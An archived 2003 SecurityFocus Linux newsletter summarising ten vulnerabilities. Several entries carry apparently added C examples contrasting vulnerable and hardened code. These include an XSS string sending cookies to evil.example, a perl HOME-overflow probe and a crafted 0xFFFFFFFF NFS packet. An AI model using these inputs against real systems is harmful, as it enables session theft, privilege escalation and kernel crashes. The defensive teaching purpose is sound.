SecurityFocus Linux Newsletter #143

From: John Boletta <jboletta(at)securityfocus.com>
Date: Mon Aug 04 2003 - 16:12:01 EDT

This Issue is Sponsored by: SPI Dynamics

NEW ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step"
It's as simple as placing additional LDAP query commands into a Web form input box giving hackers complete access to all your backend systems! Firewalls and IDS will not stop such attacks because LDAP Injections are seen as valid data. Download this *FREE* white paper from SPI Dynamics for a complete guide to protection!
http://www.securityfocus.com/SPIDynamics-linux-secnews8


I. FRONT AND CENTER
  1. Maintaining System Integrity During Forensics
  2. Firewall Evolution - Deep Packet Inspection
  3. Betting on Malware
II. LINUX VULNERABILITY SUMMARY
  1. Gallery Search Engine Cross-Site Scripting Vulnerability
  2. Valve Software Half-Life Dedicated Server Malformed Parameter...
  3. FreeRadius Chap Remote Buffer Overflow Vulnerability
  4. XBlast HOME Environment Variable Buffer Overflow Vulnerability
  5. Multiple ManDB Utility Local Buffer Overflow Vulnerabilities
  6. University of Minnesota GopherD Do_Command Buffer Overflow...
  7. KDE Konqueror HTTP REFERER Authentication Credential Leak...
  8. Valve Software Half-Life Dedicated Server Multiplayer Request...
  9. Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of...
  10. XConq Multiple Environment Variable Buffer Overflow...
III. LINUX FOCUS LIST SUMMARY
  1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
IV. NEW PRODUCTS FOR LINUX PLATFORMS
  1. CyberFusion
  2. P-Synch Total Password Management Solution
  3. WipeDrive
V. NEW TOOLS FOR LINUX PLATFORMS
  1. Traffic tool Troll v1.01
  2. GKrellM gamma v2.02
  3. fscaps v2.6.0
VI. SPONSOR INFORMATION

I. FRONT AND CENTER

1. Maintaining System Integrity During Forensics
By Jamie Morris

This article discusses best practices for maintaining system integrity during forensic examinations.

http://www.securityfocus.com/infocus/1717

2. Firewall Evolution - Deep Packet Inspection
By Ido Dubrawsky

Deep Packet Inspection can be seen as the integration of Intrusion Detection (IDS) and Intrusion Prevention (IPS) capabilities with traditional stateful firewall technology.

http://www.securityfocus.com/infocus/1716

3. Betting on Malware
By George Smith

DARPA's plan to create a futures market for terrorist activities is dead, but the concept is a natural for predicting viruses and worms.

http://www.securityfocus.com/columnists/176

II. BUGTRAQ SUMMARY


1. Gallery Search Engine Cross-Site Scripting Vulnerability
BugTraq ID: 8288
Remote: Yes
Date Published: Jul 27 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8288
Summary:

Gallery is a web-based photo album. It is written in PHP and is available for Linux and Unix variants as well as Microsoft Windows operating systems.

Gallery is prone to a cross-site scripting vulnerability. This issue is present in the search engine (search.php) facility provided by the software. Input supplied to the search engine via URI parameters is not sufficiently sanitized of HTML or script code before being echoed back to users, allowing for cross-site scripting attacks.

An attacker could exploit this issue by constructing a malicious link to the search engine that contains hostile HTML and script code. Attacker-supplied code could be rendered in the browser of a user who follows such a link. This would occur in the security context of the site hosting the vulnerable software.
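The pattern behind this class of bug, as an added example that is not Gallery's code: a page builder that interpolates the search query into HTML as-is, beside one that encodes it at the point of output. The function names, the page skeleton and the attack string are constructed here for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example (not Gallery's code). Names and markup are illustrative. */

/* Vulnerable pattern: the query string goes straight into the page. */
void render_results_unsafe(const char *query, char *out, size_t outsz)
{
    snprintf(out, outsz, "<p>Results for: %s</p>", query);
}

/* Encode the five characters that matter in HTML text and attribute context.
 * Returns a malloc'd string the caller frees, or NULL on allocation failure. */
char *html_escape(const char *s)
{
    size_t need = 1;
    for (const char *p = s; *p; p++) {
        switch (*p) {
        case '&':  need += 5; break;            /* &amp;  */
        case '<':
        case '>':  need += 4; break;            /* &lt; &gt; */
        case '"':  need += 6; break;            /* &quot; */
        case '\'': need += 5; break;            /* &#39;  */
        default:   need += 1;
        }
    }
    char *out = malloc(need);
    if (!out)
        return NULL;
    char *o = out;
    for (const char *p = s; *p; p++) {
        const char *rep = NULL;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        if (rep) {
            size_t n = strlen(rep);
            memcpy(o, rep, n);
            o += n;
        } else {
            *o++ = *p;
        }
    }
    *o = '\0';
    return out;
}

/* Hardened pattern: encode when the value is written into the page. */
int render_results_safe(const char *query, char *out, size_t outsz)
{
    char *esc = html_escape(query);
    if (!esc)
        return -1;
    snprintf(out, outsz, "<p>Results for: %s</p>", esc);
    free(esc);
    return 0;
}

/* Crude check used by the demo: did a tag survive into the rendered page? */
int contains_script_tag(const char *page)
{
    return strstr(page, "<script") != NULL;
}

int main(void)
{
    /* Constructed attack string of the kind a malicious link would carry. */
    const char *attack =
        "<script>document.location='http://evil.example/?c='+document.cookie</script>";
    char page[512];

    render_results_unsafe(attack, page, sizeof page);
    printf("unsafe: %s\n", page);
    render_results_safe(attack, page, sizeof page);
    printf("safe:   %s\n", page);
    return 0;
}
```

The fix is applied at output, not at input: the same query may be stored, logged or shown in several contexts, and only the HTML context needs HTML encoding.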

2. Valve Software Half-Life Dedicated Server Malformed Parameter Loop Denial Of Service Vulnerability
BugTraq ID: 8301
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8301
Summary:

Half-Life is a game distributed and maintained by Valve Software. It includes features that allow users to game locally or across a network. The game engine is used in many modifications.

Half-Life servers are prone to a denial of service that may be exploited by a malicious client. By supplying malformed parameters in a client packet during a request to join a multiplayer game, it may be possible to cause a loop within the server program. This would result in a crash of the vulnerable server.

This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.

3. FreeRadius Chap Remote Buffer Overflow Vulnerability
BugTraq ID: 8282
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8282
Summary:

FreeRADIUS is a freely available, open source implementation of the RADIUS protocol. It is available for the Unix and Linux operating systems.

A vulnerability has been reported in the way FreeRADIUS handles CHAP requests. Specific details are not currently available, but the problem is reported to be exploitable to execute arbitrary code with the privileges of the FreeRADIUS server, giving a remote attacker unauthorized access to the system in that context.

4. XBlast HOME Environment Variable Buffer Overflow Vulnerability
BugTraq ID: 8296
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8296
Summary:

XBlast is a multi-player arcade game available for Windows and various Linux distributions.

A locally exploitable buffer overflow vulnerability has been reported in XBlast 2.6.1.

XBlast does not perform adequate bounds checking on input supplied via the HOME environment variable. Successful exploitation can lead to arbitrary code execution. XBlast is typically installed setgid games on Linux systems, making it possible to exploit this issue to gain these privileges.

5. Multiple ManDB Utility Local Buffer Overflow Vulnerabilities
BugTraq ID: 8303
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8303
Summary:

mandb is a utility that is used to initialize or manually update the index database caches that are usually maintained by the man utility.

mandb has been reported to be affected by multiple buffer overflow vulnerabilities.

These issues present themselves in the ult_src(), add_to_dirlist(), test_for_include() functions and in the PATH/MANPATH argument handler of mandb.

The issues are due to insufficient bounds checking performed on user-supplied data before it is copied into reserved buffers in memory. A local attacker may supply excessive data in a manner sufficient to trigger these issues and in doing so corrupt arbitrary memory. It has been conjectured that an attacker may ultimately exploit this issue to execute arbitrary instructions, with elevated privileges.

Code execution would occur in the context of the mandb utility, typically user 'man'.

This BID will be split up into unique BIDs as these issues are analyzed in further detail.

6. University of Minnesota GopherD Do_Command Buffer Overflow Vulnerability
BugTraq ID: 8283
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8283
Summary:

gopherd is the implementation of the Gopher Protocol Daemon by the University of Minnesota. It is available for the Unix and Linux platforms.

It has been reported that University of Minnesota gopherd is vulnerable to a remotely exploitable boundary condition error. This may make it possible for an attacker to gain unauthorized access to a host using the vulnerable software.

The problem is in the do_command function of the Gopherd.c file. Due to insufficient bounds checking on the user-supplied data, it is possible for an attacker to overwrite sensitive process memory. This could result in the execution of arbitrary instructions with the privileges of the gopher daemon process.

7. KDE Konqueror HTTP REFERER Authentication Credential Leak Vulnerability
BugTraq ID: 8297
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8297
Summary:

Konqueror is a freely available, open source web browser distributed and maintained by the KDE project. It is available for the Unix and Linux operating systems.

It has been reported that a problem in KDE Konqueror may result in the leak of authentication credentials through the HTTP REFERER header field. This could result in an attacker gaining unauthorized access to authentication information.

When a page whose URL embeds credentials (the http://user:password@host/ form) links to another site, Konqueror sends that full referring URL, credentials included, in the Referer header of the request for the linked page. The credentials then appear in the third-party site's referrer logs, which could give that site's operators unauthorized access to the user's account on the referring site.
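What a browser should send instead, as an added example that is not Konqueror or KDE code: the Referer value for a cross-site navigation with any user:password@ portion removed, and no Referer at all when leaving an https page for plain http (the behaviour RFC 2616 section 15.1.3 recommends). The function names and the sample URLs are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not Konqueror/KDE code. Names and URLs are illustrative. */

/* Copy url into out with any "user:password@" removed from the authority.
 * Returns 1 if credentials were stripped, 0 if the URL was copied unchanged,
 * -1 if out is too small. */
int strip_userinfo(const char *url, char *out, size_t outsz)
{
    const char *scheme_end = strstr(url, "://");
    const char *auth = NULL, *at = NULL;
    size_t prefix, rest;

    if (scheme_end) {
        auth = scheme_end + 3;
        /* the authority stops at the first path, query or fragment delimiter */
        size_t auth_len = strcspn(auth, "/?#");
        for (const char *p = auth; p < auth + auth_len; p++)
            if (*p == '@')
                at = p;                      /* last '@' inside the authority */
    }
    if (!at) {                               /* nothing to strip: plain copy */
        if (strlen(url) + 1 > outsz)
            return -1;
        memcpy(out, url, strlen(url) + 1);
        return 0;
    }
    prefix = (size_t)(auth - url);           /* "scheme://" */
    rest = strlen(at + 1);                   /* "host[:port]/path..." */
    if (prefix + rest + 1 > outsz)
        return -1;
    memcpy(out, url, prefix);
    memcpy(out + prefix, at + 1, rest + 1);
    return 1;
}

/* Decide the Referer for a navigation from 'from' to 'to': send nothing when
 * leaving an https page for a non-https one, otherwise the referring URL with
 * credentials removed. Returns 1 with out filled, 0 for "send no Referer",
 * -1 if out is too small. */
int referer_for(const char *from, const char *to, char *out, size_t outsz)
{
    if (strncmp(from, "https://", 8) == 0 && strncmp(to, "https://", 8) != 0)
        return 0;
    return strip_userinfo(from, out, outsz) < 0 ? -1 : 1;
}

int main(void)
{
    char ref[256];
    /* Constructed case from the advisory: credentials embedded in the page URL. */
    const char *page = "http://alice:s3cret@photos.example.org/members/index.html";
    const char *link = "http://tracker.example.net/counter.gif";

    if (referer_for(page, link, ref, sizeof ref) == 1)
        printf("Referer: %s\n", ref);        /* no "alice:s3cret" reaches the log */
    return 0;
}
```

Only the last '@' inside the authority is treated as the userinfo separator; an '@' in the query string (a mail address in a parameter, say) is left alone.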

8. Valve Software Half-Life Dedicated Server Multiplayer Request Buffer Overflow Vulnerability
BugTraq ID: 8300
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8300
Summary:

Half-Life is a game distributed and maintained by Valve Software. It includes features that allow users to game locally or across a network. The game engine is used in many modifications.

Half-Life servers are prone to a buffer overflow that may be exploited by a malicious client. By supplying overly long parameters supplied in a client packet during a request to join a multiplayer game, it may be possible to corrupt adjacent locations of stack memory with attacker-supplied data. This could allow for code execution in the context of the vulnerable server. It should be noted that the type of data sent may be restricted by the Half-Life protocol, which may make exploitation more difficult, as certain characters will not be permitted in the client request.

This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.

9. Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of Service Vulnerability
BugTraq ID: 8298
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8298
Summary:

XDR (External Data Representation) is a protocol governing the platform independent description and encoding of data, in this particular case it is used in conjunction with the Linux implementation of NFSv3 (Network File System), used to share system based resources across a network. NFS uses XDR to describe the format of its data.

Linux Kernel 2.4 XDR handler routines for NFSv3 have been reported prone to a remote denial of service vulnerability.

The issue presents itself in the decode_fh XDR handler routine contained in the nfs3xdr.c kernel source file. The issue is due to a signed/unsigned mismatch, when processing the size field of an XDR packet.

A malicious attacker may bypass the signed sanity check (if (size > NFS3_FHSIZE)) in the decode_fh XDR handler routine by crafting an XDR packet whose size field is 0xFFFFFFFF, the two's complement representation of -1. As a negative signed value this passes the comparison, but it is then handed to memcpy() as an unsigned length of 0xFFFFFFFF (4 GB); the resulting out-of-bounds copy triggers a kernel panic.

It has been reported that the target host may need an accessible exported directory, if this vulnerability is to be successfully exploited. It should be noted that other methods to trigger the vulnerability might also be possible.

This vulnerability has been reported to affect the Linux 2.4 kernel tree.
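A userspace model of the mismatch described above, added here as an example and not taken from nfs3xdr.c: the length is read into a signed int and compared signed, so 0xFFFFFFFF slips past the bound, beside a decoder that keeps the length unsigned and also checks it against the bytes actually received. The struct, helper names and packet bytes are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not kernel source. Struct, helpers and packets are illustrative. */

#define NFS3_FHSIZE 64

/* XDR encodes integers big-endian; read and write the 4-byte length field. */
static uint32_t get_be32(const unsigned char *b)
{
    return ((uint32_t)b[0] << 24) | ((uint32_t)b[1] << 16) |
           ((uint32_t)b[2] << 8) | (uint32_t)b[3];
}

static void put_be32(unsigned char *b, uint32_t v)
{
    b[0] = (unsigned char)(v >> 24); b[1] = (unsigned char)(v >> 16);
    b[2] = (unsigned char)(v >> 8);  b[3] = (unsigned char)v;
}

struct fh { uint32_t size; unsigned char data[NFS3_FHSIZE]; };

/* Vulnerable shape: length read into a signed int and compared signed.
 * Returns 1 if the check would let the packet through and stores the length
 * memcpy() would receive; the copy itself is deliberately not performed. */
int decode_fh_signed_check(const unsigned char *p, size_t *copy_len)
{
    int size = (int)get_be32(p);   /* 0xFFFFFFFF becomes -1 on two's complement hosts */
    if (size > NFS3_FHSIZE)
        return 0;                  /* large positive sizes are rejected, as intended */
    *copy_len = (size_t)size;      /* -1 converts to SIZE_MAX: a multi-gigabyte memcpy */
    return 1;
}

/* Hardened shape: keep the length unsigned so every value above NFS3_FHSIZE,
 * including 0xFFFFFFFF, fails the bound, and refuse a length that runs past
 * the bytes actually received. Returns 0 on success, -1 on rejection. */
int decode_fh_unsigned(const unsigned char *p, size_t avail, struct fh *out)
{
    if (avail < 4)
        return -1;
    uint32_t size = get_be32(p);
    if (size > NFS3_FHSIZE)
        return -1;
    if (size > avail - 4)
        return -1;
    out->size = size;
    memcpy(out->data, p + 4, size);
    return 0;
}

/* Build a constructed XDR file-handle fragment: length field, then handle
 * bytes. The claimed length may disagree with the bytes supplied on purpose. */
size_t build_fh_packet(uint32_t claimed_len, const unsigned char *handle,
                       size_t handle_len, unsigned char *buf, size_t bufsz)
{
    if (bufsz < 4 + handle_len)
        return 0;
    put_be32(buf, claimed_len);
    if (handle_len)
        memcpy(buf + 4, handle, handle_len);
    return 4 + handle_len;
}

int main(void)
{
    unsigned char pkt[4 + NFS3_FHSIZE];
    size_t n, copy_len = 0;
    struct fh fh;

    /* Constructed attack packet: size field 0xFFFFFFFF and no handle bytes. */
    n = build_fh_packet(0xFFFFFFFFu, NULL, 0, pkt, sizeof pkt);
    printf("signed check passes: %d (memcpy length would be %zu)\n",
           decode_fh_signed_check(pkt, &copy_len), copy_len);
    printf("unsigned decoder rc: %d\n", decode_fh_unsigned(pkt, n, &fh));
    return 0;
}
```

On a 64-bit host the converted length is SIZE_MAX rather than 4 GB; either way the copy runs off the end of the receive buffer, which in the kernel is the panic the advisory describes. The second check in decode_fh_unsigned matters as well: a length within NFS3_FHSIZE that still exceeds the bytes received would otherwise read past the packet.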

10. XConq Multiple Environment Variable Buffer Overflow Vulnerabilities
BugTraq ID: 8307
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8307
Summary:

xconq is a multiplayer game that is available for a number of Unix/Linux variants.

Multiple locally exploitable buffer overflows have been reported in xconq. This is due to insufficient bounds checking of data supplied via the USER and DISPLAY environment variables. This may permit a local attacker to corrupt adjacent regions of stack memory with specific values, allowing execution of arbitrary code in the context of the program, which is typically installed setgid 'games'.

This issue appears similar to BID 1495. Further analysis of these issues may determine that the issues are identical, in which case this BID will be retired and the earlier BID will be updated.
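The shape shared by this entry, the XBlast HOME issue (entry 4) and the mandb PATH/MANPATH handler (entry 5), as an added example that is not code from any of those projects: an environment value of attacker-chosen length copied into a fixed stack buffer without a length check, beside a version that measures first and refuses what does not fit. The buffer size, variable names and the suffix are chosen here for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not XBlast/mandb/xconq code. Sizes and names are illustrative. */

#define PATHBUF 64   /* small on purpose so the arithmetic is easy to follow */

enum { PATH_OK = 0, PATH_UNSET = -1, PATH_TOO_LONG = -2 };

/* Vulnerable pattern: fixed stack buffer, unbounded copy. In a setgid binary
 * the caller of the program controls the environment, so this is a local
 * privilege boundary. Never call it with untrusted input; the demo only
 * passes a value that fits. */
void build_config_path_unsafe(const char *value, const char *suffix, char *out)
{
    char buf[PATHBUF];
    strcpy(buf, value);          /* no length check: this is the bug */
    strcat(buf, suffix);
    strcpy(out, buf);
}

/* Hardened pattern: measure, refuse anything that does not fit, then copy
 * with explicit bounds. 'value' is the already-fetched environment value so
 * the function can be exercised without touching the real environment. */
int build_config_path_checked(const char *value, const char *suffix,
                              char *out, size_t outsz)
{
    if (value == NULL)
        return PATH_UNSET;
    size_t vlen = strlen(value), slen = strlen(suffix);
    if (vlen + slen + 1 > outsz)
        return PATH_TOO_LONG;
    memcpy(out, value, vlen);
    memcpy(out + vlen, suffix, slen + 1);
    return PATH_OK;
}

/* The condition a local exploit arranges: a variable longer than the buffer. */
int would_overflow(const char *value, const char *suffix)
{
    return strlen(value) + strlen(suffix) + 1 > PATHBUF;
}

int main(void)
{
    char out[PATHBUF];

    /* A realistic HOME fits in both versions. */
    build_config_path_unsafe("/home/alice", "/.xblastrc", out);
    printf("unsafe, benign input: %s\n", out);

    /* Constructed attacker value: 300 bytes, the usual first probe against a
     * setgid game, e.g. HOME=$(perl -e 'print "A"x300') ./game */
    char evil[301];
    memset(evil, 'A', 300);
    evil[300] = '\0';
    printf("unsafe version would overflow: %d\n", would_overflow(evil, "/.xblastrc"));
    printf("checked version rc: %d\n",
           build_config_path_checked(evil, "/.xblastrc", out, sizeof out));
    return 0;
}
```

The value from getenv() is the only input here, so the length check is the whole defence; a setgid games binary should additionally assume every environment variable it reads (HOME, USER, DISPLAY, PATH, MANPATH) is hostile.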

III. LINUX FOCUS LIST SUMMARY

1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03

IV. NEW PRODUCTS FOR LINUX PLATFORMS

1. CyberFusion
by Proginet Corp
Platforms: AIX, HP-UX, Linux, OS/390, Solaris, SunOS, Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.proginetuk.co.uk/products/cyberfusion/cyberfusion.htm
Summary:

CyberFusion enables secure, reliable, scalable, automated and comprehensive end-to-end management for secure file transfer across an extensive range of disparate computing platforms, including all mainframes and client/server environments. CyberFusion also provides extensive auditing, reporting and monitoring of activity. Secure file transfers for data backup, data recovery, disaster recovery, data archiving, data warehouse and other purposes are all easily enabled using the many features which offer much more than basic secure FTP (SFTP) or Secure Shell (SSH). Standard FTP software is not the cheap option it appears when total cost of ownership (TCO) is properly examined and the improved computer security is taken into account.

2. P-Synch Total Password Management Solution by M-TECH
Platforms: AIX, DG-UX, HP-UX, IRIX, Linux, MVS, Netware, Solaris, SunOS, VMS, Windows NT
Relevant URL:
http://www.p-synch.com/
Summary:

P-Synch is a total password management solution. It is intended to reduce the cost of ownership of password systems, and simultaneously improve the security of password protected systems. This is done through:
- Password synchronization.
- Enforcing an enterprise-wide password strength policy.
- Allowing authenticated users to reset their own forgotten passwords and enable their locked-out accounts.
- Streamlining help desk call resolution for password resets.
P-Synch is available for both internal use, on the corporate Intranet, as well as for Internet deployment in B2B and B2C applications.

3. WipeDrive
by AccessData
Platforms: DOS, Linux, OS/2, UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.accessdata.com/Product07_Overview.htm?ProductNum=07
Summary:

Completely Eliminate Hard Drive Data

V. NEW TOOLS FOR LINUX PLATFORMS


1. Traffic Tool Troll v1.01
by Alexander Newald alexander@newald.de
Relevant URL:
http://linux.newald.de/
Platforms: N/A
Summary:

The Traffic Tool Troll is a traffic monitoring and management script. Traffic statistics are generated by port, hour, day, month, and year, and you can define a custom period for your needs. The script is written in Perl and uses iptables and MySQL to collect and store the traffic data.

2. GKrellM gamma v2.02
by Gregory Thiemonge gregory.thiemonge@libertysurf.fr
Relevant URL:
http://gthiemonge.free.fr/gkrellm-gamma
Platforms: Linux
Summary:

Gkrellm gamma is a Gkrellm plugin which allows you to control your monitor's gamma correction under XFree86 (as xgamma does).

3. fscaps v2.6.0
by Olaf Dietsche
Relevant URL:
http://www.olafdietsche.de/linux/capability/
Platforms: Linux
Summary:

fscaps implements filesystem capabilities for the Linux operating system (2.5 and up). With filesystem capabilities, you will be able to grant selective privileges to executables on a needed basis. This means there is no need anymore to run executables as root or as a suid root binary.

VI. SPONSOR INFORMATION


This Issue is Sponsored by: SPI Dynamics
http://www.securityfocus.com/SPIDynamics-linux-secnews8


Received on Mon Aug 4 17:11:19 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:27 EDT